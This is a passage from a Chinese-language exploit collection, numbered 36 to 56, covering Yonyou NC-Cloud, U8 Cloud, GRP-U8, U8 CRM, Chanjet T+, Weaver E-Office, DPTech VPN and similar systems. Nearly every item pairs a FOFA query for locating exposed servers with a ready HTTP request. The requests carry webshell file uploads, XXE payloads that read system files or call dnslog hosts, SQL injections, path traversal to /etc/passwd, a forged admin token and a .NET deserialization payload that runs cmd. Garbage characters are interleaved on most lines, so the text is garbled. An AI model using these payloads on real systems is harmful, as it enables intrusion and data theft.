. L0 `% o4 T8 B3 F+ v0 F! I- A; nPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
5 K) [7 ~' p& o1 ? s% u, p: ~Host: 203.25.218.166:8888
+ f5 t( L" Y8 c0 q( A+ e( [User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; h" v) z( F$ M5 R
Accept-Encoding: gzip, deflate
; t3 D, T& Q3 o% n, R% w" R: P0 mAccept: */*
( B& q& {. [( t' h5 w+ x2 P. ^Connection: close
, K( D7 }" ~5 c" X0 B5 haccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
0 @% i w1 C1 Q! wContent-Length: 190
) O! D+ ?6 o8 I# i/ A- g$ \3 ~ hContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0) e0 z) Z5 q- ~- Z' Z1 G7 h4 _
5 b% X$ K- p( e# @) z! w
--fd28cb44e829ed1c197ec3bc71748df0
( Z% a, Y% @. @ Y' RContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
. E7 k c- x: L6 U/ ]
/ f. o2 |# N ?7 b* |8 W$ @<%out.println(1111*1111);%>+ |" A3 B: }, T4 I) q2 l6 j
--fd28cb44e829ed1c197ec3bc71748df0--
* b, D! h+ w8 v* L' p1 j, n) P% a# h7 f% Z% T' ~
1 s9 O( c% \3 V4 `$ B8 g' s36. 用友NC-Cloud soapFormat XXE3 A5 L( l0 z3 P. r9 f
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
4 x' S0 r1 `4 vPOST /uapws/soapFormat.ajax HTTP/1.1
$ L* {2 m7 ?! lHost: 192.168.40.130:8989
0 m3 v* c/ p# T: @" E0 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
$ [7 e/ g' B j/ \3 AContent-Length: 263
. ?0 w% ~: H- L; X2 E0 G- {0 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 X4 _: G+ a: T2 e7 |
Accept-Encoding: gzip, deflate& l* @% T0 T2 o8 u$ _; i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 e; @/ ~5 i4 U4 g& P+ t- U
Connection: close( X3 b$ Z" X$ s. o
Content-Type: application/x-www-form-urlencoded
$ V# w, _; d I1 L5 s( VUpgrade-Insecure-Requests: 1
W t( t7 q" v' l6 G; `7 |2 ^+ z. S1 O d. @' w5 s
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
6 U1 p* G* |* u4 @
% R. |: M& N; Q: k. Z( f/ W5 b2 D' Y! v8 r+ A% J
37. 用友NC-Cloud IUpdateService XXE4 W" h% p' }$ h
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"; W! L% x; ]6 N6 I' e, \7 @
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
; r/ l- ] f, j3 j; x7 JHost: 192.168.40.130:8989
+ w& p8 t; T& U6 l; L* a8 L" CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! a0 \6 g b5 k- N, `; {% pContent-Length: 421( O( G" n" N5 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 w0 _! P+ G- M1 }
Accept-Encoding: gzip, deflate
5 e* m" e7 R' n; m1 B% cAccept-Language: zh-CN,zh;q=0.90 Z& P) D' Q- U2 N
Connection: close
) C6 l4 z% c& O$ p8 HContent-Type: text/xml;charset=UTF-8
L+ h9 z0 {1 e PSOAPAction: urn:getResult* t3 d$ R" Y8 N5 S( G) ^
Upgrade-Insecure-Requests: 1
. q# Y; r: X- |
- D7 C% H1 \$ A% }# `<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
6 ~5 I3 x9 n% \, Z$ E* P3 M6 ]6 T<soapenv:Header/>
5 H" E; K8 C2 \" C3 o8 G0 S7 L<soapenv:Body>
& |0 ]6 l' @" }, {' l- e<iup:getResult>
- T/ K8 ?. P4 I' c6 |. k<!--type: string-->
- G# T9 p) Y9 U8 R" V: o<iup:string><![CDATA[ S4 Z4 r7 }3 Q6 E
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>3 b( g1 O8 F$ o& P) A% G$ m8 W$ l- n
<xxx/>]]></iup:string>
+ P6 |% C2 O0 ^</iup:getResult>! R% b8 U# J3 F6 A- E, f- O
</soapenv:Body>
2 e. F9 S& w% F$ H- D/ t- o5 g</soapenv:Envelope>) s! J0 v4 Y L
J( s$ Z. K3 e0 i/ X. q2 y6 K) d& d4 n& @8 Z
$ L0 p3 D) F1 m38. 用友U8 Cloud smartweb2.RPC.d XXE) V: s0 q3 Z2 S ^! I' U
FOFA:app="用友-U8-Cloud"
; _4 [. }7 [( u( S, b# ?POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
% _) s3 r/ k+ }Host: 192.168.40.131:8088
' p: i. A5 h$ M2 _9 P7 ]7 n" lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
2 @) q. W0 s$ g" pContent-Length: 260# T, c/ \' F- B; O7 Y7 R, r$ e) n* L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' V# F! u" m6 J- L5 d
Accept-Encoding: gzip, deflate
' n+ j. \) r! {2 @: e C' ?Accept-Language: zh-CN,zh;q=0.93 Y0 Q3 r7 h t U
Connection: close6 L! |. j. s8 K5 |6 S# d$ b
Content-Type: application/x-www-form-urlencoded
& I, T$ C- a) N9 H1 B+ e5 [ Y4 R2 D% w( J
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
' J* J- W1 Z) e: G; H0 R* P
: D% r0 _$ M; w1 @( S, ~& z
* N& _3 a" A4 r- U39. 用友U8 Cloud RegisterServlet SQL注入
/ C! }: a% J+ n7 nFOFA:title="u8c"
6 C- t1 e8 s; ^ tPOST /servlet/RegisterServlet HTTP/1.1
. n3 n. l! H9 ]: d% oHost: 192.168.86.128:8089
- ^' c$ I. c; m4 E8 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
! Q7 f, P: l, u8 p1 P# N: yConnection: close
. {3 i: |. E" F/ [2 qContent-Length: 85$ q' H: }! }" \ J3 e) z2 O, K, R
Accept: */*
$ w# {% z, u1 N1 ]; n% w$ xAccept-Language: en
* d' e$ }$ S4 m5 H. K7 ~; DContent-Type: application/x-www-form-urlencoded
# h! o6 D3 x2 M9 ^# sX-Forwarded-For: 127.0.0.1' A' p& l/ j5 T# L1 ~# m- Q
Accept-Encoding: gzip
, ~2 n: \1 u8 `8 z/ G8 D/ }% p6 b- z* U5 E% k, }
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
. g8 w u- B8 }8 T$ N& c* K
# c) P8 b; H6 ^5 \9 R
! J3 H: _/ p5 F7 _# G$ I" Q40. 用友U8-Cloud XChangeServlet XXE
9 Z$ p- n4 T. }: z8 p, ZFOFA:app="用友-U8-Cloud"5 Z# ~. v1 g! m r: D& @- v, \
POST /service/XChangeServlet HTTP/1.1
& v% `- q9 ^' k# x; p# P7 aHost: x.x.x.x7 T" s @, u1 h& f
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 p+ y( n- ~5 k g5 }' w/ g! `8 ]1 oContent-Type: text/xml
. x) l* K: }; i9 @/ ?/ J2 BConnection: close" f) D( Z7 a1 u3 w
& j4 O* S: }: ~& i7 ~0 `7 }% E
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>- y4 x3 I% M: A, N \ A
" O% S1 u* X, O
0 ?( [" p, B& M; l o5 m$ _/ x41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
1 ^9 {, i7 l5 g6 _1 M2 ~: T* d6 uFOFA:app="用友-U8-Cloud"
% h. r% u: @6 V) NGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
5 U; t" Y& h8 ?$ K d9 k+ V9 h. [Host:2 \* J$ t3 L% N) `8 t1 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' c0 M' U: B2 J$ {) T* OContent-Type: application/json
! w; e n. b: s0 m) eAccept-Encoding: gzip6 |5 z- }3 K2 L- \4 @
Connection: close
* d1 I1 K, J. o# `. Y1 G& L7 c, _# E! S% K4 A! Y0 o
9 Q) Z1 j/ t& W+ B42. 用友GRP-U8 SmartUpload01 文件上传8 W* ^$ D6 X% b6 i# n |( ?# |
FOFA:app="用友-GRP-U8"
* |6 N: z* t% SPOST /u8qx/SmartUpload01.jsp HTTP/1.13 O" q/ s0 S& ~ a/ V
Host: x.x.x.x
" [1 I8 Z* E& \: x$ r- gContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt; o3 M7 X- C$ S& E' D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
! H5 s+ ?6 ?) F( f6 g9 @. a6 }# w1 q
PAYLOAD& ]) N) m6 B, k- w. ]
6 w7 p! r: p# G9 _6 A
* E/ Y5 f' [! F8 Y, ghttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
7 y! E/ B( b' W" W9 ^" |! J
% E) v [( z6 V% y8 U- _43. 用友GRP-U8 userInfoWeb SQL注入致RCE
! @4 Y; x. t4 ^4 n: i* dFOFA:app="用友-GRP-U8"# v! S. r3 c8 s. [. Q* ~# A$ n
POST /services/userInfoWeb HTTP/1.1
3 d# v3 ^# d% ]% \$ E. XHost: your-ip* X6 t- u4 t/ k6 ?9 K. @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ }- ~, E- G7 ^6 k* {% S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 q8 X t0 _5 V2 mAccept-Encoding: gzip, deflate2 S, \: B7 r2 s1 W
Accept-Language: zh-CN,zh;q=0.94 s+ t* h+ I/ F5 r( q
Connection: close2 I+ {: R- q8 W, d# x
SOAPAction:6 c$ f: A! X6 ]$ d% x
Content-Type: text/xml;charset=UTF-8" {7 J- v) z& M4 ]+ o2 S
$ |7 |3 A& d* C4 o& i<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">' \* q$ n+ }# X: T9 i
<soapenv:Header/>$ q- X1 D8 G' G
<soapenv:Body>' k( B+ K2 W+ V: N: l A3 r
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">6 s w1 p U1 f0 W, N3 W2 s9 A
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>" H% F3 Y* D% k: d9 a
</ser:getUserNameById>& o( o0 x7 x# x% }; k4 `, b
</soapenv:Body>4 L$ D' R/ e* Y
</soapenv:Envelope>! _# c7 ?- I# Z- m. i
' r _: O/ b" p- q5 T8 o
& J, l% f# Q8 X. Z4 k44. 用友GRP-U8 bx_dj_check.jsp SQL注入+ S0 G9 X- T( R, R3 [+ ~: w+ n) k6 ^% [; z: s
FOFA:app="用友-GRP-U8": A2 V1 K' W; Q* _8 `/ t2 ?
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1& j2 W+ H' ?. `: f! K e7 S
Host: your-ip; g$ _! J6 ~! Q5 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36: A4 C6 F( g$ c$ S- J. N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 ?8 X" R0 g( x5 p9 o
Accept-Encoding: gzip, deflate# Y6 l& }% Y+ `: j/ `7 [
Accept-Language: zh-CN,zh;q=0.96 c, M, b8 z+ M4 z! F' d0 B
Connection: close
; c& r5 p8 F: I5 t0 S
2 e8 m9 u6 E" P) U
) i% S4 A4 S" V3 h1 a45. 用友GRP-U8 ufgovbank XXE+ ^. n5 E2 z1 i! d
FOFA:app="用友-GRP-U8" @0 Z+ l4 x" I
POST /ufgovbank HTTP/1.1
% M7 R' }* B) ?! h8 n; U" e9 JHost: 192.168.40.130:222: j6 I9 m! E6 B9 h& |+ |; e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
6 y3 e" Q c" G. i1 ]& n$ VConnection: close, \" N( @& A0 J: `( W
Content-Length: 161; g2 D! | e5 X2 C4 l8 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 V0 f+ d* }: j. z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. M' V- O5 O/ H( V# r3 l6 H
Content-Type: application/x-www-form-urlencoded
; J, c+ l( E% _8 i% j; XAccept-Encoding: gzip
, o1 g/ j2 _5 u; ~# X: d: B, D5 Q2 V( b& w8 n. F* [2 z
reqData=<?xml version="1.0"?>
8 x6 }9 n4 o1 P<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
0 F9 K) h* G \1 A) A9 \+ K) m2 I: x" b3 ]: ], F
; T8 c( P- ]- Y
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% {3 _5 _. y8 k V* zFOFA:app="用友-GRP-U8"* L4 ]0 ^9 S9 n5 }0 n: L
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
5 W L- c8 x0 L: p# PHost: your-ip, m& `9 K. i% x' u0 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.360 f* x b6 e( J1 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& A1 V2 p" D9 D. F" {5 Z3 qAccept-Encoding: gzip, deflate
) G; u5 A' e4 x `7 p- wAccept-Language: zh-CN,zh;q=0.9
% @5 c/ f( J ~ Y' T6 m1 u0 gConnection: close' [0 z7 f1 J' B4 k
`. A, s2 r4 i9 U' W. h. O
% L, _6 ]6 F% o7 f& ?/ I4 J47. 用友GRP A++Cloud 政府财务云 任意文件读取$ s2 T9 Y9 D$ _- ~/ e+ m h4 \5 _
FOFA:body="/pf/portal/login/css/fonts/style.css"
# V+ z2 I4 R3 `$ BGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
) t5 ]2 e A4 ]8 g& G ]Host: x.x.x.x& N& x! J# l! \7 G2 P; w
Cache-Control: max-age=0: g3 E8 x) f7 v
Upgrade-Insecure-Requests: 1
: }4 {, |- W R% o% _+ M3 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 h! r/ L3 U: bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& a5 f9 w5 q) C
Accept-Encoding: gzip, deflate, br2 {; z2 \5 X6 }. z4 O/ L# |7 ]
Accept-Language: zh-CN,zh;q=0.92 I5 c; h, G) ?3 T7 u0 s6 x! Q
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT" V" F0 R' X2 d/ R% O. b* Y8 R
Connection: close3 r2 V1 f6 ], ^; r0 e; F
. ?+ `$ |: l1 ~0 V& q% s3 z0 C3 z! J; Z C' s
1 w$ q M( w% _- Y) w. V48. 用友U8 CRM swfupload 任意文件上传
& h0 k, ~1 ~1 ~! ?. r+ DFOFA:title="用友U8CRM"% }( m' y1 t+ Q
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.10 V* U5 O( }' T/ k$ ~! O- L* N- s
Host: your-ip
" [" B: s) H( Q9 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; R: _" @3 ^) O, c rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 x2 n2 p# ] g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 V5 ?5 U+ y9 ^4 f' m" Z% y
Accept-Encoding: gzip, deflate% V2 N S7 Q/ {" ^& n" Z0 s
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
: V% C* L( W& v' ~, d5 f( o0 r------2695209672394068716424300668552 d# ]# W% M5 d# M3 b
Content-Disposition: form-data; name="file"; filename="s.php"
1 G6 y8 T( W3 d$ j1231. L/ k# l8 \1 E8 {( ^
Content-Type: application/octet-stream
5 X; s/ w' s$ e9 P7 x$ D2 a# F------269520967239406871642430066855) V% [ F6 k3 {: j4 H* L* [
Content-Disposition: form-data; name="upload"
5 b- D C3 V8 k x2 iupload
7 B6 w; _7 H9 U' Z2 I% }6 @------269520967239406871642430066855--
% z& Y# [! Q/ Y7 e# [- I' o* @
: ^% H# Y( F: x$ c. W; Z
6 a( D) @9 N, ^6 D0 L& @. j& N49. 用友U8 CRM系统uploadfile.php接口任意文件上传
. Z' l* E8 ^/ T) b# j) m! U2 GFOFA:body="用友U8CRM"+ _) L4 N+ [7 h, o- w; i4 g6 x
& H& ?/ e; W- ^5 `, l- n* K0 B: CPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
1 G6 G6 a( t" _6 ^+ z1 p# t5 iHost: x.x.x.x6 R" G5 r+ m0 R5 E F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& f1 [' s& g2 a$ O5 o3 JContent-Length: 329
7 p1 W7 \) W t% uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( k% D/ Q! _( j' YAccept-Encoding: gzip, deflate
% N5 G! }5 h. z4 Z# b: p& v3 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ }2 @( @7 r, J% s3 S0 R* k: BConnection: close
% h7 c0 j* B, P1 n) X5 t5 IContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w* E6 a7 B' l' g5 x, j! ^
H( ~/ [1 I1 E
-----------------------------vvv3wdayqv3yppdxvn3w$ g7 a @. a+ e) [- m. L; y+ m
Content-Disposition: form-data; name="file"; filename="%s.php "& H- `4 Q" U8 m0 s( m
Content-Type: application/octet-stream; l$ l$ u4 s8 p. E2 Q
* a8 G7 y5 b' M9 E) Q; Fwersqqmlumloqa; i9 Z9 o$ [0 \
-----------------------------vvv3wdayqv3yppdxvn3w5 z, R" O- T1 E7 b J5 ~
Content-Disposition: form-data; name="upload"% ^9 t/ g# t1 n1 o( `- a
% ~0 N% {+ P* u# l7 f1 h5 c& K4 xupload7 T+ D+ T9 I7 b& M
-----------------------------vvv3wdayqv3yppdxvn3w--9 Y2 f# e$ W! O" p
- C d. K' ?* T0 N% p% w
$ g0 v& D4 V- ]9 P' [- O, E* thttp://x.x.x.x/tmpfile/updB3CB.tmp.php
$ s; y! @ z: H# J; @( s1 u
7 a6 K9 c8 j$ z- s# Z50. QDocs Smart School 6.4.1 filterRecords SQL注入8 s' r" C' g2 K7 |" D! P9 t- {: B; M) j
FOFA:body="close closebtnmodal"
/ v- z2 p4 I- v* w; y9 ZPOST /course/filterRecords/ HTTP/1.1
8 W9 Y' C8 L: P. O: K( n/ DHost: x.x.x.x
' B6 I3 H9 V8 h1 w: h" p2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* Q4 T' t; l! m) I- V* ^
Connection: close0 Q. ~' F' @; o) F
Content-Length: 224. `" o6 p3 S/ V: \& x4 o! L5 f" u
Accept: */*! `4 S' T" G2 n. P5 [# x
Accept-Language: en
' N* A9 |/ I, p1 @) rContent-Type: application/x-www-form-urlencoded
; P* y# n% N( X2 @, e5 `! B& _8 CAccept-Encoding: gzip0 U+ Q% G( I4 A3 C/ m. L, L" t
/ P! o! A: g3 J6 G" c; U" N
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
$ q# F2 o- e j8 l
' t9 R" q) }/ h* g# F
8 K5 |( k" v: e0 T( g51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
8 R( C. o1 M$ D+ C% Y) RFOFA:app="云时空社会化商业ERP系统"
1 e) l8 D, Q+ s& u1 ^GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" _) z# E$ Y8 K, y3 c* EHost: your-ip8 k) K% I& e2 G' V& v2 e2 P1 I8 o& f
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.367 B+ g0 s, g7 N6 t7 Y# I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 Z' c& b2 c# bAccept-Encoding: gzip, deflate! c" Q6 D: F2 ^3 R) Y
Accept-Language: zh-CN,zh;q=0.96 k) Q4 {( y, @6 G; n* S
Connection: close
, Y+ D, K3 T6 E
# a: N/ m( J3 l# g2 r
! e6 R. p, G7 \7 z$ D52. 泛微E-Office json_common.php sql注入
; r* w$ @6 }# @$ A% gFOFA:app="泛微-EOffice"8 I6 j! i! S r
POST /building/json_common.php HTTP/1.19 O$ O, L& F( p/ ?" x0 L4 N; a
Host: 192.168.86.128:8097
/ e1 C r. D' f# U2 J( s7 rUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! s" O. J. y5 I, t) [1 A
Connection: close' a: a9 t( ?* o: W5 v g" _
Content-Length: 87
# k7 r& b& k" m( _" m. y1 BAccept: */*
1 }- V# w) g5 P. }Accept-Language: en1 y& G+ R3 S9 O
Content-Type: application/x-www-form-urlencoded
& ^; C, ?7 f" Z* P" q9 ]5 wAccept-Encoding: gzip
/ g) s7 W; P3 L) S* M8 Q5 M* j9 \1 Y) c& w: f g
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
# v% ~1 a7 m+ j# V/ Q% _0 X9 j# @( I# U7 [, C
0 X' J0 j$ K/ ^+ L1 W6 w' g2 F6 q% {
53. 迪普 DPTech VPN Service 任意文件上传
4 Z; g8 Q8 `6 N. XFOFA:app="DPtech-SSLVPN"- I9 ^) Z* x3 x8 {
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
& x+ s/ X$ {0 u2 J( b- B+ n9 |7 l+ ^8 d' d$ w, F
- M8 C3 q6 V, s9 p54. 畅捷通T+ getstorewarehousebystore 远程代码执行8 A4 m8 _7 M$ [- b- y% u
FOFA:app="畅捷通-TPlus"
& I$ n' j/ S+ G) G2 L& b/ _第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件) ?% i- l/ d$ J, l
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"5 }" C# O7 O7 u
" m/ L } d0 M6 E& v; `
+ j6 d, P6 L" L# R- j/ H' s完整数据包
* {; b: ?4 E/ j) x) E; GPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1' r2 g6 r! J. [& G
Host: x.x.x.x
9 N8 |* G) c! g/ {) ~$ F: QUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
% ^, O/ G0 |$ A4 D( r5 r" }1 eContent-Length: 593' W; {: a1 l U N1 E! _
' o: }7 Y6 W) ]: S. o/ C: i& c
{
, t% I( n6 g; {0 {. k"storeID":{
6 I3 l' Y5 D8 J' t9 }. s' _8 n "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& c- C9 I8 C$ S! U
"MethodName":"Start",! ]% I/ p( C+ B2 Q! s* i
"ObjectInstance":{' w" q$ t! t! J: d! J, u+ F
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 U; s7 Z% J. f* @" t& W "StartInfo":{
3 \4 o5 A7 P/ L O. M "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* T% w* R+ j h, F7 Z" K0 U! Q
"FileName":"cmd",
* U! P3 @" g! B- K& j& s( j "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
9 t6 Q$ c0 n j7 [8 ? }* R; A; }# J: s, R
}
* u7 v. n, }* y5 \! [) \5 V/ { }
5 ]+ m; G. X, G6 n" V/ A}
* h* _7 b2 Z4 Z+ e* X* u1 v' b$ o. x
' \+ q; A C4 T; b
第二步,访问如下url
% @" I8 A$ B$ Z/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
! w1 p& [( }& E) f) {- b' K+ A/ o8 [7 L/ P* v$ s b. w
& m. |0 Q& u' E( Z) Z4 e1 h55. 畅捷通T+ getdecallusers信息泄露; D1 s0 T$ f5 l" Y
FOFA:app="畅捷通-TPlus"; A, c9 z* j9 r$ t$ b, v w; z
第一步,通过( k8 V! n Z. w: B- X: o4 m% U
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
2 c2 o; T s; ~5 ?第二步,利用获取到的Cookie请求
( c; J) t* F! s: H# {7 s" p/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers1 R ^0 ~6 y/ [, s2 {
/ [& M- q$ G7 f3 `7 l
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 k3 J$ ^+ G: ]8 r4 Y- G' ?FOFA: app="畅捷通-TPlus"% J& \; h2 L2 a5 a2 \' O! ]/ _( {
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ w/ E* l* _8 U, ~
Host: x.x.x.x
